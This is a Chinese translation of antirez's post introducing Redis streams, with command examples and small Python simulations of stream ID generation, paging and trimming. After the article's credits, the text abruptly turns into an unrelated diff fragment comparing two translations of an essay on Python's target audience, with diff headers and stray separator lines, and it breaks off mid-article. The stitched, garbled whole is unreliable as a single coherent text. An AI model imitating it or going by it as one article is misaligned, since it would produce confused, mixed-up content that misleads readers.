然而在那时 Redis 有个问题,那就是缺省情况下导出数据结构并不轻松。它在 Redis <ruby>列表<rt>list</rt></ruby>、<ruby>有序集合<rt>sorted list</rt></ruby>、<ruby>发布/订阅<rt>Pub/Sub</rt></ruby>功能之间有某些缺陷。你可以权衡使用这些工具对一个消息或事件建模。
|
||||||
|
|
||||||
|
排序集合是内存消耗大户,那自然就不能对投递相同消息进行一次又一次的建模,客户端不能阻塞新消息。因为有序集合并不是一个序列化的数据结构,它是一个元素可以根据它们量的变化而移动的集合:所以它不像时序性的数据那样。
|
||||||
|
|
||||||
|
列表有另外的问题,它在某些特定的用例中产生类似的适用性问题:你无法浏览列表中间的内容,因为在那种情况下,访问时间是线性的。此外,没有任何指定输出的功能,列表上的阻塞操作仅为单个客户端提供单个元素。列表中没有固定的元素标识,也就是说,不能指定从哪个元素开始给我提供内容。
|
||||||
|
|
||||||
|
对于一对多的工作任务,有发布/订阅机制,它在大多数情况下是非常好的,但是,对于某些不想<ruby>“即发即弃”<rt>fire-and-forget</rt></ruby>的东西:保留一个历史是很重要的,不只是因为是断开之后重新获得消息,也因为某些如时序性的消息列表,用范围查询浏览是非常重要的:在这 10 秒范围内温度读数是多少?
|
||||||
|
|
||||||
|
我试图解决上述问题,我想规划一个通用的有序集合,并列入一个独特的、更灵活的数据结构,然而,我的设计尝试最终以生成一个比当前的数据结构更加矫揉造作的结果而告终。Redis 有个好处,它的数据结构导出更像自然的计算机科学的数据结构,而不是 “Salvatore 发明的 API”。因此,我最终停止了我的尝试,并且说,“ok,这是我们目前能提供的”,或许我会为发布/订阅增加一些历史信息,或者为列表访问增加一些更灵活的方式。然而,每次在会议上有用户对我说 “你如何在 Redis 中模拟时间系列” 或者类似的问题时,我的脸就绿了。

### 起源

在 Redis 4.0 中引入模块之后,用户开始考虑他们自己怎么去修复这些问题。其中一个用户 Timothy Downs 通过 IRC 和我说道:

\<forkfork> 我计划给这个模块增加一个事务日志式的数据类型 —— 这意味着大量的订阅者可以在不导致 redis 内存激增的情况下做一些像发布/订阅那样的事情

\<forkfork> 订阅者持有他们在消息队列中的位置,而不是让 Redis 必须维护每个消费者的位置和为每个订阅者复制消息

他的思路启发了我。我想了几天,并且意识到这可能是我们马上同时解决上面所有问题的契机。我需要去重新构思 “日志” 的概念是什么。日志是个基本的编程元素,每个人都使用过它,因为它只是简单地以追加模式打开一个文件,并以一定的格式写入数据。然而 Redis 数据结构必须是抽象的。它们在内存中,并且我们使用内存并不是因为我们懒,而是因为使用一些指针,我们可以概念化数据结构并把它们抽象,以使它们摆脱明确的限制。例如,一般来说日志有几个问题:偏移不是逻辑化的,而是真实的字节偏移,如果你想要与条目插入的时间相关的逻辑偏移应该怎么办?我们有范围查询可用。同样,日志通常很难进行垃圾回收:在一个只能进行追加操作的数据结构中怎么去删除旧的元素?好吧,在我们理想的日志中,我们只需要说,我想要数字最大的那个条目,而旧的元素一个也不要,等等。

当我从 Timothy 的想法中受到启发,去尝试着写一个规范的时候,我使用了 Redis 集群中的 radix 树去实现,优化了它内部的某些部分。这为实现一个有效利用空间的日志提供了基础,而且仍然可以用<ruby>对数时间<rt>logarithmic time</rt></ruby>来访问范围。同时,我开始去读关于 Kafka 流以获得另外的灵感,它也非常适合我的设计,最后借鉴了 Kafka <ruby>消费群体<rt>consumer groups</rt></ruby>的概念,并且再次针对 Redis 进行优化,以适用于 Redis 在内存中使用的情况。然而,该规范仅停留在纸面上,在一段时间后我几乎把它从头到尾重写了一遍,以便将我与别人讨论的所得到的许多建议一起增加到 Redis 升级中。我希望 Redis 流能成为对于时间序列有用的特性,而不仅是一个常见的事件和消息类的应用程序。

### 让我们写一些代码吧

从 Redis 大会回来后,整个夏天我都在实现一个叫 listpack 的库。这个库是 `ziplist.c` 的继任者,那是一个表示在单个分配中的字符串元素列表的数据结构。它是一个非常特殊的序列化格式,其特点在于也能够以逆序(从右到左)解析:以便在各种用例中替代 ziplists。

结合 radix 树和 listpacks 的特性,它可以很容易地去构建一个空间高效的日志,并且还是可索引的,这意味着允许通过 ID 和时间进行随机访问。自从这些就绪后,我开始去写一些代码以实现流数据结构。我还在完成这个实现,不管怎样,现在在 Github 上的 Redis 的 streams 分支里它已经可以跑起来了。我并没有声称那个 API 是 100% 的最终版本,但是,这有两个有意思的事实:一,在那时只有消费群组是缺失的,加上一些不太重要的操作流的命令,但是,所有的大的方面都已经实现了。二,一旦各个方面比较稳定了之后,我决定大概用两个月的时间将所有的流的特性<ruby>向后移植<rt>backport</rt></ruby>到 4.0 分支。这意味着 Redis 用户想要使用流,不用等待 Redis 4.2 发布,它们在生产环境马上就可用了。这是可能的,因为作为一个新的数据结构,几乎所有的代码改变都出现在新的代码里面。除了阻塞列表操作之外:该代码被重构了,我们对于流和列表阻塞操作共享了相同的代码,而极大地简化了 Redis 内部实现。

### 教程:欢迎使用 Redis 的 streams

在某些方面,你可以认为流是 Redis 列表的一个增强版本。流元素不再是一个单一的字符串,而是一个<ruby>字段<rt>field</rt></ruby>和<ruby>值<rt>value</rt></ruby>组成的对象。范围查询更适用而且更快。在流中,每个条目都有一个 ID,它是一个逻辑偏移量。不同的客户端可以<ruby>阻塞等待<rt>blocking-wait</rt></ruby>比指定的 ID 更大的元素。Redis 流的一个基本的命令是 `XADD`。是的,所有的 Redis 流命令都是以一个 `X` 为前缀的。

```
> XADD mystream * sensor-id 1234 temperature 10.5
1506871964177.0
```

这个 `XADD` 命令将追加指定的条目作为一个指定的流 —— “mystream” 的新元素。上面示例中的这个条目有两个字段:`sensor-id` 和 `temperature`,每个条目在同一个流中可以有不同的字段。使用相同的字段名可以更好地利用内存。有意思的是,字段的排序是可以保证顺序的。`XADD` 仅返回插入的条目的 ID,因为在第三个参数中是星号(`*`),表示由命令自动生成 ID。通常这样做就够了,但是也可以去强制指定一个 ID,这种情况用于复制这个命令到<ruby>从服务器<rt>slave server</rt></ruby>和 <ruby>AOF<rt>append-only file</rt></ruby> 文件。

这个 ID 是由两部分组成的:一个毫秒时间和一个序列号。`1506871964177` 是毫秒时间,它只是一个毫秒级的 UNIX 时间戳。圆点(`.`)后面的数字 `0` 是一个序号,它是为了区分相同毫秒数的条目增加上去的。这两个数字都是 64 位的无符号整数。这意味着,我们可以在流中增加所有想要的条目,即使是在同一毫秒中。ID 的毫秒部分取的是 Redis 服务器的当前本地时间和流中最后一个条目 ID 的毫秒部分两者中较大的一个。因此,举例来说,即使是计算机时间回跳,这个 ID 仍然是增加的。在某些情况下,你可以认为流条目的 ID 是完整的 128 位数字。然而,事实上它们与被添加到的实例的本地时间有关,这意味着我们可以在毫秒级的精度的范围随意查询。
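
上面描述的 ID 生成规则(取本地毫秒时间与最后一个条目 ID 的毫秒部分中较大的一个,同一毫秒内递增序号)可以用一小段 Python 来示意。注意这只是一个帮助理解的模拟,并不是 Redis 的实际实现:

```python
import time

def next_stream_id(last_id, now_ms=None):
    """模拟 Redis 流 ID 的生成:ID 是 (毫秒时间, 序号) 二元组。

    取当前本地毫秒时间与流中最后一个条目 ID 的毫秒部分中较大的一个,
    因此即使系统时钟回跳,生成的 ID 仍然单调递增。
    """
    if now_ms is None:
        now_ms = int(time.time() * 1000)
    last_ms, last_seq = last_id
    if now_ms > last_ms:
        return (now_ms, 0)          # 新的毫秒:序号从 0 开始
    return (last_ms, last_seq + 1)  # 同一毫秒(或时钟回跳):序号递增

# 同一毫秒内连续插入:仅序号递增
assert next_stream_id((1506871964177, 0), now_ms=1506871964177) == (1506871964177, 1)
# 时钟回跳:ID 仍然递增
assert next_stream_id((1506871964177, 1), now_ms=1506871964000) == (1506871964177, 2)
```

由于 ID 是 (毫秒, 序号) 二元组,按字典序比较即可得到条目的插入顺序,这也是下文范围查询能按时间工作的原因。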

正如你想的那样,快速添加两个条目后,结果是仅一个序号递增了。我们可以用一个 `MULTI`/`EXEC` 块来简单模拟“快速插入”:

```
> MULTI
OK
> XADD mystream * foo 10
QUEUED
> XADD mystream * bar 20
QUEUED
> EXEC
1) 1506872463535.0
2) 1506872463535.1
```

上面的示例中,也展示了无需指定任何初始<ruby>模式<rt>schema</rt></ruby>的情况下,对不同的条目使用不同的字段。会发生什么呢?就像前面提到的一样,每个块(它通常包含 50-150 个消息)的第一个消息被用作参考,与其字段相同的连续条目会使用一个标志进行压缩,这个标志表示“与这个块中的第一个条目的字段相同”。因此,使用相同字段的连续消息可以节省许多内存,即使是字段集随着时间发生缓慢变化的情况下也很节省内存。

为了从流中检索数据,这里有两种方法:范围查询,它是通过 `XRANGE` 命令实现的;<ruby>流播<rt>streaming</rt></ruby>,它是通过 `XREAD` 命令实现的。`XRANGE` 命令仅取得包括从开始到停止范围内的全部条目。因此,举例来说,如果我知道它的 ID,我可以使用如下的命令取得单个条目:

```
> XRANGE mystream 1506871964177.0 1506871964177.0
1) 1) 1506871964177.0
   2) 1) "sensor-id"
      2) "1234"
      3) "temperature"
      4) "10.5"
```

不管怎样,你都可以使用指定的开始符号 `-` 和停止符号 `+` 表示最小和最大的 ID。为了限制返回条目的数量,也可以使用 `COUNT` 选项。下面是一个更复杂的 `XRANGE` 示例:

```
> XRANGE mystream - + COUNT 2
1) 1) 1506871964177.0
   2) 1) "sensor-id"
      2) "1234"
      3) "temperature"
      4) "10.5"
2) 1) 1506872463535.0
   2) 1) "foo"
      2) "10"
```

这里我们讲的是 ID 的范围,然后,为了取得在一个给定时间范围内的特定范围的元素,你可以使用 `XRANGE`,因为 ID 的“序号”部分可以省略。因此,你可以只指定“毫秒”时间即可,下面的命令的意思是:“从 UNIX 时间 1506872463 开始给我 10 个条目”:

```
127.0.0.1:6379> XRANGE mystream 1506872463000 + COUNT 10
1) 1) 1506872463535.0
   2) 1) "foo"
      2) "10"
2) 1) 1506872463535.1
   2) 1) "bar"
      2) "20"
```

关于 `XRANGE` 需要注意的最重要的事情是,假设我们在回复中收到 ID,随后连续的 ID 只是增加了序号部分,所以可以使用 `XRANGE` 遍历整个流,接收每个调用的指定个数的元素。在 Redis 的 `*SCAN` 系列命令(它让本不是为迭代而设计的 Redis 数据结构可以被迭代)之后,我避免了再犯相同的错误。
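
上面说的遍历方式可以用一段纯 Python 来示意(这里用一个按 ID 排序的列表模拟流,函数名是假设的,并非真实的 Redis 客户端 API):

```python
def xrange_sim(stream, start, stop, count):
    """模拟 XRANGE:返回 ID 在 [start, stop] 闭区间内的最多 count 个条目。
    stream 是按 ID 排序的 (id, fields) 列表,id 是 (毫秒, 序号) 二元组。"""
    out = []
    for entry_id, fields in stream:
        if start <= entry_id <= stop:
            out.append((entry_id, fields))
            if len(out) == count:
                break
    return out

def iterate_stream(stream, count=2):
    """用 XRANGE 分页遍历整个流:每次从上一批最后一个 ID 的下一个序号开始。"""
    cursor = (0, 0)
    while True:
        batch = xrange_sim(stream, cursor, (float("inf"), float("inf")), count)
        if not batch:
            return
        yield from batch
        last_ms, last_seq = batch[-1][0]
        cursor = (last_ms, last_seq + 1)  # 连续 ID 仅序号递增,因此 +1 即为“下一个”

stream = [((1, 0), {"a": 1}), ((1, 1), {"b": 2}), ((2, 0), {"c": 3})]
assert list(iterate_stream(stream)) == stream
```

与 `*SCAN` 系列命令不同,这种遍历不需要不透明的游标,ID 本身就是可恢复的迭代位置。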

### 使用 XREAD 处理流播:阻塞新的数据

当我们想通过 ID 或时间去访问流中的一个范围,或者是通过 ID 去获取单个元素时,使用 `XRANGE` 是非常完美的。然而,在数据到达后流必须由不同的客户端来消费的使用场景中,这就不是一个很好的解决方案,因为这需要某种形式的<ruby>轮询<rt>polling</rt></ruby>。(对于 *某些* 应用程序来说,这可能是个好主意,因为它们仅是偶尔连接查询的)

`XREAD` 命令是为读取设计的,可以同时从多个流中读取,只需指定我们从每个流中已得到的最后条目的 ID。此外,如果没有数据可用,我们可以要求阻塞,当数据到达时,就解除阻塞。类似于阻塞列表操作产生的效果,但是这里并没有消费从流中得到的数据,并且多个客户端可以同时访问同一份数据。

这里有一个典型的 `XREAD` 调用示例:

```
> XREAD BLOCK 5000 STREAMS mystream otherstream $ $
```

它的意思是:从 `mystream` 和 `otherstream` 取得数据。如果没有数据可用,阻塞客户端 5000 毫秒。在 `STREAMS` 选项之后指定我们想要监听的关键字,最后指定想要监听的 ID,指定的 ID 为 `$` 的意思是:假设我现在已经有了流中的所有元素,因此,只需要从下一个到达的元素开始给我。

如果我从另一个客户端发送这样的命令:

```
> XADD otherstream * message “Hi There”
```

在 `XREAD` 侧会出现什么情况呢?

```
1) 1) "otherstream"
2) 1) 1) 1506935385635.0
      2) 1) "message"
         2) "Hi There"
```

与收到的数据一起,我们也得到了数据的关键字。在下次调用中,我们将使用接收到的最新消息的 ID:

```
> XREAD BLOCK 5000 STREAMS mystream otherstream $ 1506935385635.0
```

依次类推。然而需要注意的是使用方式,客户端有可能在一个非常大的延迟之后再次连接(因为它处理消息需要时间,或者其它什么原因)。在这种情况下,期间会有很多消息堆积,为了确保客户端不被消息淹没,以及服务器不会因为给单个客户端提供大量消息而浪费太多的时间,使用 `XREAD` 的 `COUNT` 选项是非常明智的。
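
这种“记录最后一个 ID、每次最多取 COUNT 个”的消费循环,可以用一段纯 Python 来示意(同样用列表模拟流,并非真实的 Redis 客户端代码):

```python
def xread_sim(stream, last_id, count):
    """模拟 XREAD ... COUNT:返回 ID 严格大于 last_id 的最多 count 个条目。"""
    return [(eid, fields) for eid, fields in stream if eid > last_id][:count]

# 消费者循环:记录已读到的最后一个 ID,每次最多取 COUNT 个,避免被积压的消息淹没
stream = [((1, 0), "a"), ((1, 1), "b"), ((2, 0), "c")]
last_id = (0, 0)
seen = []
while True:
    batch = xread_sim(stream, last_id, count=2)
    if not batch:
        break          # 真实客户端会在这里用 BLOCK 选项阻塞等待新消息
    seen.extend(batch)
    last_id = batch[-1][0]
assert seen == stream
```

即使客户端断开很久后重连,只要它保存了 `last_id`,就能以可控的批量补读积压的消息。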

### 流封顶

目前看起来还不错……然而,有些时候,流需要删除一些旧的消息。幸运的是,这可以使用 `XADD` 命令的 `MAXLEN` 选项去做:

```
> XADD mystream MAXLEN 1000000 * field1 value1 field2 value2
```

它的基本意思是,如果在流中添加新元素后发现消息数量超过了 `1000000` 个,那么就删除旧的消息,以便于元素总量重新回到 `1000000` 以内。它很像是在列表中使用的 `RPUSH` + `LTRIM`,但是,这次我们是使用了一个内置机制去完成的。然而,需要注意的是,上面的意思是每次我们增加一个新的消息时,我们还需要另外的工作去从流中删除旧的消息。这将消耗一些 CPU 资源,所以在计算 `MAXLEN` 之前,尽可能使用 `~` 符号,以表明我们不要求非常 *精确* 的 1000000 个消息,就是稍微多一些也不是大问题:

```
> XADD mystream MAXLEN ~ 1000000 * foo bar
```

这种方式的 `XADD` 仅当它可以删除整个节点的时候才会删除消息。相比普通的 `XADD`,这种方式几乎可以自由地对流进行封顶。
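
这种“仅在可以删除整个节点时才删除”的近似封顶策略,可以用一段纯 Python 来示意(这里假设每个块固定包含 100 个条目,真实的 listpack 块大小并不固定):

```python
BLOCK_SIZE = 100  # 假设的块大小,仅用于演示

def xadd_maxlen_approx(stream, entry, maxlen):
    """模拟 MAXLEN ~:只有当可以整块删除时才进行裁剪,
    因此流的长度可能略微超过 maxlen,但裁剪的开销小得多。"""
    stream.append(entry)
    excess = len(stream) - maxlen
    whole_blocks = excess // BLOCK_SIZE       # 只删除完整的块
    if whole_blocks > 0:
        del stream[: whole_blocks * BLOCK_SIZE]
    return stream

s = list(range(250))
xadd_maxlen_approx(s, 250, maxlen=100)        # 追加后共 251 个元素,超出 151 个
assert len(s) == 151                          # 只删除了 1 个整块(100 个),而不是精确的 151 个
```

精确的 `MAXLEN` 则必须在块的中间删除元素,这正是它开销更高的原因。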

### 消费组(开发中)

这是第一个 Redis 中尚未实现而在开发中的特性。灵感也是来自 Kafka,尽管在这里是以不同的方式实现的。重点是使用 `XREAD` 时,客户端也可以增加一个 `GROUP <name>` 选项。相同组的所有客户端将自动得到 *不同的* 消息。当然,同一个流可以被多个组读取。在这种情况下,所有的组将收到流中到达的消息的相同副本。但是,在每个组内,消息是不会重复的。

当指定组时,能够指定一个 `RETRY <milliseconds>` 选项去扩展组:在这种情况下,如果消息没有通过 `XACK` 进行确认,它将在指定的毫秒数后进行再次投递。这将为消息投递提供更佳的可靠性,这种情况下,客户端没有私有的方法将消息标记为已处理。这一部分也正在开发中。
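
这里描述的 RETRY 重投递语义可以用一段纯 Python 来示意(注意这是对设想中行为的简化模拟,该特性当时仍在开发中):

```python
def pending_to_redeliver(pending, now_ms, retry_ms):
    """模拟消费组的 RETRY 语义:对超过 retry_ms 仍未被 XACK 确认的消息,
    返回需要重新投递的消息 ID 列表。pending 是 {消息ID: (投递时间, 已确认?)}。"""
    return [mid for mid, (delivered_at, acked) in pending.items()
            if not acked and now_ms - delivered_at >= retry_ms]

pending = {
    (1, 0): (1000, True),    # 已确认,不再投递
    (1, 1): (1000, False),   # 未确认且已超时,需要重投
    (2, 0): (1900, False),   # 未确认但尚未超时
}
assert pending_to_redeliver(pending, now_ms=2000, retry_ms=500) == [(1, 1)]
```

未确认消息的超时重投,正是它比“即发即弃”的发布/订阅可靠性更高的地方。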

### 内存使用和节省加载时间

由于 Redis 流的建模设计,它的内存使用率非常低。这取决于字段、值的数量和长度,对于简单的消息,每使用 100MB 内存可以存放几百万条消息。此外,这种格式设想为需要极少的序列化:listpack 块以 radix 树节点方式存储,在磁盘上和内存中都以相同方式表示,因此它们可以很轻松地存储和读取。例如,Redis 可以在 0.3 秒内从 RDB 文件中读取 500 万个条目。这使流的复制和持久存储非常高效。

我还计划允许从条目中间进行部分删除。现在仅实现了一部分,策略是在标记中将条目标识为已删除,当已删除条目占全部条目的比例达到指定值时,这个块将被回收重写,如果需要,它将被连到相邻的另一个块上,以避免碎片化。

### 关于最终发布时间的结论

Redis 的流特性将包含在年底前(LCTT 译注:本文原文发布于 2017 年 10 月)推出的 Redis 4.0 系列的稳定版中。我认为这个通用的数据结构将为 Redis 提供一个巨大的补丁,以用于解决很多现在很难解决的情况:那意味着你(之前)需要创造性地“滥用”当前提供的数据结构去解决那些问题。一个非常重要的使用场景是时间序列,但是,我觉得对于其它场景来说,通过 `XREAD` 来流播消息将是非常有趣的,因为对于那些需要更高可靠性的应用程序,可以使用发布/订阅模式来替换“即用即弃”,还有其它全新的使用场景。现在,如果你想在你的使用环境中评估这个新数据结构,可以获取 GitHub 上的 streams 分支开始试用。欢迎向我们报告所有的 bug。:-)

如果你喜欢观看视频的方式,这里有一个现场演示:https://www.youtube.com/watch?v=ELDzy9lCFHQ

---

via: http://antirez.com/news/114

作者:[antirez][a]
译者:[qhwdw](https://github.com/qhwdw)
校对:[wxy](https://github.com/wxy)、[pityonline](https://github.com/pityonline)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]: http://antirez.com/
[1]: https://zh.wikipedia.org/wiki/CAP%E5%AE%9A%E7%90%86
@ -1,78 +1,78 @@
|
|||||||
谁是 Python 的目标受众?
|
盘点 Python 的目标受众
|
||||||
============================================================
|
============================================================
|
||||||
|
|
||||||
Python 是为谁设计的?
|
Python 是为谁设计的?
|
||||||
|
|
||||||
* [Python 使用情况的参考][8]
|
* [Python 的参考解析器使用情况][8]
|
||||||
* [CPython 主要服务于哪些受众?][9]
|
* [CPython 主要服务于哪些受众?][9]
|
||||||
* [这些相关问题的原因是什么?][10]
|
* [这些相关问题的原因是什么?][10]
|
||||||
* [适合进入 PyPI 规划的方面有哪些?][11]
|
* [适合进入 PyPI 规划的方面有哪些?][11]
|
||||||
* [当增加它到标准库中时,为什么一些 API 会被改变?][12]
|
* [当添加它们到标准库中时,为什么一些 API 会被改变?][12]
|
||||||
* [为什么一些 API 是以<ruby>临时<rt>provisional</rt></ruby>的形式被增加的?][13]
|
* [为什么一些 API 是以<ruby>临时<rt>provisional</rt></ruby>的形式被添加的?][13]
|
||||||
* [为什么只有一些标准库 API 被升级?][14]
|
* [为什么只有一些标准库 API 被升级?][14]
|
||||||
* [标准库任何部分都有独立的版本吗?][15]
|
* [标准库任何部分都有独立的版本吗?][15]
|
||||||
* [这些注意事项为什么很重要?][16]
|
* [这些注意事项为什么很重要?][16]
|
||||||
|
|
||||||
几年前, 我在 python-dev 邮件列表里面、活跃的 CPython 核心开发人员、以及决定参与该过程的人员中[强调][38]说,“CPython 的动作太快了也太慢了”,作为这种冲突的一个主要原因是,他们不能有效地使用他们的个人时间和精力。
|
几年前,我在 python-dev 邮件列表中,以及在活跃的 CPython 核心开发人员和认为参与这一过程不是有效利用他们个人时间和精力的人中[强调][38]说,“CPython 的发展太快了也太慢了”是很多冲突的原因之一。
|
||||||
|
|
||||||
我一直在考虑这种情况,在参与的这几年,我也花费了一些时间去思考这一点,在我写那篇文章的时候,我还在<ruby>波音防务澳大利亚公司<rt>Boeing Defence Australia</rt></ruby>工作。下个月,我将离开波音进入<ruby>红帽亚太<rt>Red Hat Asia-Pacific</rt></ruby>,并且开始在大企业的[开源供应链管理][39]上形成<ruby>再分发者<rt>redistributor</rt></ruby>层面的观点。
|
我一直认为事实确实如此,但这也是一个要点,在这几年中我也花费了一些时间去反思它。在我写那篇文章的时候,我还在<ruby>波音防务澳大利亚公司<rt>Boeing Defence Australia</rt></ruby>工作。下个月,我将离开波音进入<ruby>红帽亚太<rt>Red Hat Asia-Pacific</rt></ruby>,并且开始在大企业的[开源供应链管理][39]上获得<ruby>再分发者<rt>redistributor</rt></ruby>层面的视角。
|
||||||
|
|
||||||
### Python 使用情况的参考
|
### Python 的参考解析器使用情况
|
||||||
|
|
||||||
我尝试将 CPython 的使用情况分解如下,它虽然有些过于简化(注意,这些分类并不是很清晰,他们仅关注影响新软件特性和版本的部署不同因素):
|
我尝试将 CPython 的使用情况分解如下,它虽然有些过于简化(注意,这些分类的界线并不是很清晰,他们仅关注于思考新软件特性和版本发布后不同因素的影响):
|
||||||
|
|
||||||
* 教育类:教育工作者的主要兴趣在于建模方法的教学和计算操作方面,_不会去_ 写或维护软件产品。例如:
|
* 教育类:教育工作者的主要兴趣在于建模方法的教学和计算操作方面,_不会去_ 写或维护生产级别的软件。例如:
|
||||||
* 澳大利亚的 [数字课程][1]
|
* 澳大利亚的 [数字课程][1]
|
||||||
* Lorena A. Barba 的 [AeroPython][2]
|
* Lorena A. Barba 的 [AeroPython][2]
|
||||||
* 个人的自动化爱好者的项目:主要的是软件,经常是只有软件,而且用户通常是写它的人。例如:
|
* 个人级的自动化和爱好者的项目:主要的是软件,而且经常是只有软件,用户通常是写它的人。例如:
|
||||||
* my Digital Blasphemy [image download notebook][3]
|
* my Digital Blasphemy [图片下载器][3]
|
||||||
* Paul Fenwick 的 (Inter)National [Rick Astley Hotline][4]
|
* Paul Fenwick 的 (Inter)National [Rick Astley Hotline][4]
|
||||||
* <ruby>组织<rt>organisational</rt></ruby>过程的自动化:主要是软件,经常是只有软件,用户是为了利益而编写它的组织。例如:
|
* <ruby>组织<rt>organisational</rt></ruby>过程自动化:主要是软件,而且经常是只有软件,用户是为了利益而编写它的组织。例如:
|
||||||
* CPython 的 [核心开发工作流工具][5]
|
* CPython 的 [核心工作流工具][5]
|
||||||
* Linux 发行版的开发、构建 & 发行工具
|
* Linux 发行版的开发、构建 & 发行管理工具
|
||||||
* “<ruby>一劳永逸<rt>Set-and-forget</rt></ruby>” 的基础设施中:这里是软件,(这种说法有时候有些争议),在生命周期中该软件几乎不会升级,但是,在底层平台可能会升级。例如:
|
* “<ruby>一劳永逸<rt>Set-and-forget</rt></ruby>” 的基础设施中:这里是软件,(这种说法有时候有些争议),在生命周期中该软件几乎不会升级,但是,在底层平台可能会升级。例如:
|
||||||
* 大多数的自我管理的企业或机构的基础设施(在那些资金充足的可持续工程计划中,这是让人非常不安的)
|
* 大多数的自我管理的企业或机构的基础设施(在那些资金充足的可持续工程计划中,这种情况是让人非常不安的)
|
||||||
* 拨款资助的软件(当最初的拨款耗尽时,维护通常会终止)
|
* 拨款资助的软件(当最初的拨款耗尽时,维护通常会终止)
|
||||||
* 有严格认证要求的软件(如果没有绝对必要的话,从经济性考虑,重新认证比常规更新来说要昂贵很多)
|
* 有严格认证要求的软件(如果没有绝对必要的话,从经济性考虑,重新认证比常规更新来说要昂贵很多)
|
||||||
* 没有自动升级功能的嵌入式软件系统
|
* 没有自动升级功能的嵌入式软件系统
|
||||||
* 持续升级的基础设施:具有健壮的持续工程化模型的软件,对于依赖和平台升级被认为是例行的,而不去关心其它的代码改变。例如:
|
* 持续升级的基础设施:具有健壮支撑的工程学模型的软件,对于依赖和平台升级通常是例行的,而不去关心其它的代码改变。例如:
|
||||||
* Facebook 的 Python 服务基础设施
|
* Facebook 的 Python 服务基础设施
|
||||||
* 滚动发布的 Linux 分发版
|
* 滚动发布的 Linux 分发版
|
||||||
* 大多数的公共 PaaS 无服务器环境(Heroku、OpenShift、AWS Lambda、Google Cloud Functions、Azure Cloud Functions等等)
|
* 大多数的公共 PaaS 无服务器环境(Heroku、OpenShift、AWS Lambda、Google Cloud Functions、Azure Cloud Functions等等)
|
||||||
* 间歇性升级的标准的操作环境:对其核心组件进行常规升级,但这些升级以年为单位进行,而不是周或月。例如:
|
* 间隔性升级的标准的操作环境:对其核心组件进行常规升级,但这些升级以年为单位进行,而不是周或月。例如:
|
||||||
* [VFX 平台][6]
|
* [VFX 平台][6]
|
||||||
* 长周期支持的 Linux 分发版
|
* 长周期支持的 Linux 分发版
|
||||||
* CPython 和 Python 标准库
|
* CPython 和 Python 标准库
|
||||||
* 基础设施管理 & 业务流程工具(比如 OpenStack、 Ansible)
|
* 基础设施管理 & 编排工具(比如 OpenStack、 Ansible)
|
||||||
* 硬件控制系统
|
* 硬件控制系统
|
||||||
* 短生命周期的软件:软件仅被使用一次,然后就丢弃或忽略,而不是随后接着升级。例如:
|
* 短生命周期的软件:软件仅被使用一次,然后就丢弃或忽略,而不是随后接着升级。例如:
|
||||||
* <ruby>临时<rt>Ad hoc</rt></ruby>自动脚本
|
* <ruby>临时<rt>Ad hoc</rt></ruby>自动脚本
|
||||||
* 被确定为 “终止” 的单用户游戏(你玩它们一次后,甚至都忘了去卸载它,或许在一个新的设备上都不打算再去安装它)
|
* 被确定为 “终止” 的单用户游戏(你玩它们一次后,甚至都忘了去卸载它,或许在一个新的设备上都不打算再去安装它)
|
||||||
* 短暂的或非持久状态的单用户游戏(如果你卸载并重安装它们,你的游戏体验也不会有什么大的变化)
|
* 短暂的或非持久状态的单用户游戏(如果你卸载并重安装它们,你的游戏体验也不会有什么大的变化)
|
||||||
* 特定事件的应用程序(这些应用程序与特定的物理事件捆绑,一旦事件结束,这些应用程序就不再有用了)
|
* 特定事件的应用程序(这些应用程序与特定的物理事件捆绑,一旦事件结束,这些应用程序就不再有用了)
|
||||||
* 定期使用的应用程序:部署后定期升级的软件。例如:
|
* 频繁使用的应用程序:部署后定期升级的软件。例如:
|
||||||
* 业务管理软件
|
* 业务管理软件
|
||||||
* 个人 & 专业的生产力应用程序(比如,Blender)
|
* 个人 & 专业的生产力应用程序(比如,Blender)
|
||||||
* 开发工具 & 服务(比如,Mercurial、 Buildbot、 Roundup)
|
* 开发工具 & 服务(比如,Mercurial、 Buildbot、 Roundup)
|
||||||
* 多用户游戏,和其它明显的处于持续状态的还没有被定义为 “终止” 的游戏
|
* 多用户游戏,和其它明显的处于持续状态的还没有被定义为 “终止” 的游戏
|
||||||
* 有自动升级功能的嵌入式软件系统
|
* 有自动升级功能的嵌入式软件系统
|
||||||
* 共享的抽象层:软件组件的设计使它能够在特定的问题域有效地工作,即使你没有亲自掌握该领域的所有错综复杂的东西。例如:
|
* 共享的抽象层:在一个特定的问题领域中,设计用于让工作更高效的软件组件。即便是你没有亲自掌握该领域的所有错综复杂的东西。例如:
|
||||||
* 大多数的运行时库和归入这一类的框架(比如,Django、Flask、Pyramid、SQL Alchemy、NumPy、SciPy、requests)
|
* 大多数的运行时库和归入这一类的框架(比如,Django、Flask、Pyramid、SQL Alchemy、NumPy、SciPy、requests)
|
||||||
* 也适合归入这里的许多测试和类型引用工具(比如,pytest、Hypothesis、vcrpy、behave、mypy)
|
* 适合归入这一类的许多测试和类型推断工具(比如,pytest、Hypothesis、vcrpy、behave、mypy)
|
||||||
* 其它应用程序的插件(比如,Blender plugins、OpenStack hardware adapters)
|
* 其它应用程序的插件(比如,Blender plugins、OpenStack hardware adapters)
|
||||||
* 本身就代表了 “Python 世界” 的基准的标准库(那是一个 [难以置信的复杂][7] 的世界观)
|
* 本身就代表了 “Python 世界” 基准的标准库(那是一个 [难以置信的复杂][7] 的世界观)
|
||||||
|
|
||||||
### CPython 主要服务于哪些受众?
|
### CPython 主要服务于哪些受众?
|
||||||
|
|
||||||
最终,CPython 和标准库的主要受众是哪些,不论什么原因,比较有限的标准库和从 PyPI 安装的显式声明的第三方库的组合,所提供的服务是不够的。
|
从根本上说,CPython 和标准库的主要受众是哪些呢,是那些不管出于什么原因,将有限的标准库和从 PyPI 显式声明安装的第三方库组合起来所提供的服务,还不能够满足需求的那些人。
|
||||||
|
|
||||||
为了更进一步简化上面回顾的不同用法和部署模式,尽可能的总结,将最大的 Python 用户群体分开来看,一种是,在一些环境中将 Python 作为一种_脚本语言_使用的;另外一种是将它用作一个_应用程序开发语言_,最终发布的是一种产品而不是他们的脚本。
|
为了更进一步简化上面回顾的不同用法和部署模型,尽可能的总结,将最大的 Python 用户群体分开来看,一种是,在一些感兴趣的环境中将 Python 作为一种_脚本语言_使用的那些人;另外一种是将它用作一个_应用程序开发语言_的那些人,他们最终发布的是一种产品而不是他们的脚本。
|
||||||
|
|
||||||
当把 Python 作为一种脚本语言来使用时,它们典型的开发者特性包括:
|
把 Python 作为一种脚本语言来使用的开发者的典型特性包括:
|
||||||
|
|
